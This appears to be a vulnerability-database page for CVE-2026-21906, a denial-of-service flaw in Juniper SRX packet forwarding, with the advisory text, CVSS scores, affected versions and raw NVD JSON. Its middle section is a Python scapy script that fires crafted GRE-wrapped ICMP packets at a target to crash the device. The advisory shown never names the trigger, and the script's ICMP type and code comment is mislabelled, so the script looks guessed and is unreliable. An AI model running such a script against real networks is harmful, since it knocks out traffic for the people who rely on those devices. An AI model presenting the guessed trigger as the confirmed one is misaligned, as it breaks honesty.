CVE-2026-21906

Description

An Improper Handling of Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated network-based attacker sending a specific ICMP packet through a GRE tunnel to cause the PFE to crash and restart. When PowerMode IPsec (PMI) and GRE performance acceleration are enabled and the device receives a specific ICMP packet, a crash occurs in the SRX PFE, resulting in traffic loss. PMI is enabled by default, and GRE performance acceleration can be enabled by running the configuration command shown below. PMI is a mode of operation that provides IPsec performance improvements using Vector Packet Processing. Note that PMI with GRE performance acceleration is only supported on specific SRX platforms. This issue affects Junos OS on the SRX Series: * all versions before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S5, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S1, 25.2R2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.4:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.4:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.4:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx320:-:*:*:*:*:*:*:* - NOT VULNERABLE

Juniper Junos OS SRX Series < 21.4R3-S12

Juniper Junos OS SRX Series >= 22.4 且 < 22.4R3-S8

Juniper Junos OS SRX Series >= 23.2 且 < 23.2R2-S5

Juniper Junos OS SRX Series >= 23.4 且 < 23.4R2-S5

Juniper Junos OS SRX Series >= 24.2 且 < 24.2R2-S3

Juniper Junos OS SRX Series >= 24.4 且 < 24.4R2-S1

Juniper Junos OS SRX Series >= 25.2 且 < 25.2R1-S1, 25.2R2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21906 PoC - Juniper SRX GRE ICMP DoS
# This PoC demonstrates sending a crafted ICMP packet through GRE tunnel
# to trigger PFE crash on vulnerable Juniper SRX devices

from scapy.all import IP, ICMP, GRE, send
import sys

def cve_2026_21906_poc(target_ip, gre_tunnel_ip):
    """
    Send crafted ICMP packet through GRE tunnel to trigger PFE crash
    
    Args:
        target_ip: Target Juniper SRX device IP
        gre_tunnel_ip: GRE tunnel endpoint IP
    """
    # Craft outer IP header for GRE encapsulation
    outer_ip = IP(src=gre_tunnel_ip, dst=target_ip)
    
    # GRE header with protocol type for IP encapsulation
    gre_header = GRE(proto=0x0800)
    
    # Craft inner IP header
    inner_ip = IP(src="10.0.0.1", dst="10.0.0.2")
    
    # Craft malicious ICMP packet - type/code combination that triggers the bug
    # Using redirect or destination unreachable for maximum impact
    icmp_packet = ICMP(type=5, code=1)  # Redirect, gateway unreachable
    
    # Assemble the complete packet
    packet = outer_ip / gre_header / inner_ip / icmp_packet
    
    print(f"[*] Sending crafted ICMP packet to {target_ip} via GRE tunnel")
    print(f"[*] Packet structure: GRE({gre_tunnel_ip} -> {target_ip}) -> ICMP")
    
    # Send multiple packets to ensure crash
    send(packet, count=10, inter=0.1)
    
    print(f"[+] Packets sent. Target PFE should crash and restart.")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2026_21906_poc.py <target_ip> <gre_tunnel_ip>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    gre_tunnel_ip = sys.argv[2]
    cve_2026_21906_poc(target_ip, gre_tunnel_ip)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21906
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21906
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21906/
[4] VulDB https://vuldb.com/cve/CVE-2026-21906
[5] https://kb.juniper.net/JSA106005
[6] https://supportportal.juniper.net/JSA106005
[7] https://www.juniper.net/documentation/us/en/software/junos/vpn-ipsec/topics/topic-map/security-powermode-ipsec-vpn.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21906", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:06.177", "lastModified": "2026-01-23T19:40:34.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Handling of Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated network-based attacker sending a specific ICMP packet through a GRE tunnel to cause the PFE to crash and restart.\n\nWhen PowerMode IPsec (PMI) and GRE performance acceleration are enabled and the device receives a specific ICMP packet, a crash occurs in the SRX PFE, resulting in traffic loss. PMI is enabled by default, and GRE performance acceleration can be enabled by running the configuration command shown below. PMI is a mode of operation that provides IPsec performance improvements using Vector Packet Processing.\n\nNote that PMI with GRE performance acceleration is only supported on specific SRX platforms.\nThis issue affects Junos OS on the SRX Series:\n\n\n\n * all versions before 21.4R3-S12, \n * from 22.4 before 22.4R3-S8, \n * from 23.2 before 23.2R2-S5, \n * from 23.4 before 23.4R2-S5, \n * from 24.2 before 24.2R2-S3, \n * from 24.4 before 24.4R2-S1, \n * from 25.2 before 25.2R1-S1, 25.2R2."}, {"lang": "es", "value": "Una vulnerabilidad de Manejo Inadecuado de Condiciones Excepcionales en el motor de reenvío de paquetes (PFE) de Juniper Networks Junos OS en la serie SRX permite a un atacante no autenticado basado en red que envía un paquete ICMP específico a través de un túnel GRE causar que el PFE falle y se reinicie.\n\nCuando PowerMode IPsec (PMI) y la aceleración de rendimiento GRE están habilitados y el dispositivo recibe un paquete ICMP específico, ocurre una falla en el PFE del SRX, lo que resulta en pérdida de tráfico. PMI está habilitado por defecto, y la aceleración de rendimiento GRE puede habilitarse ejecutando el comando de configuración que se muestra a continuación. PMI es un modo de operación que proporciona mejoras de rendimiento de IPsec utilizando el procesamiento de paquetes vectoriales.\n\nTenga en cuenta que PMI con aceleración de rendimiento GRE solo es compatible con plataformas SRX específicas.\nEste problema afecta a Junos OS en la serie SRX:\n\n * todas las versiones anteriores a 21.4R3-S12,\n * desde 22.4 anteriores a 22.4R3-S8,\n * desde 23.2 anteriores a 23.2R2-S5,\n * desde 23.4 anteriores a 23.4R2-S5,\n * desde 24.2 anteriores a 24.2R2-S3,\n * desde 24.4 anteriores a 24.4R2-S1,\n * desde 25.2 anteriores a 25.2R1-S1, 25.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Red", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-755"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.4", "matchCriteriaId" ... (truncated)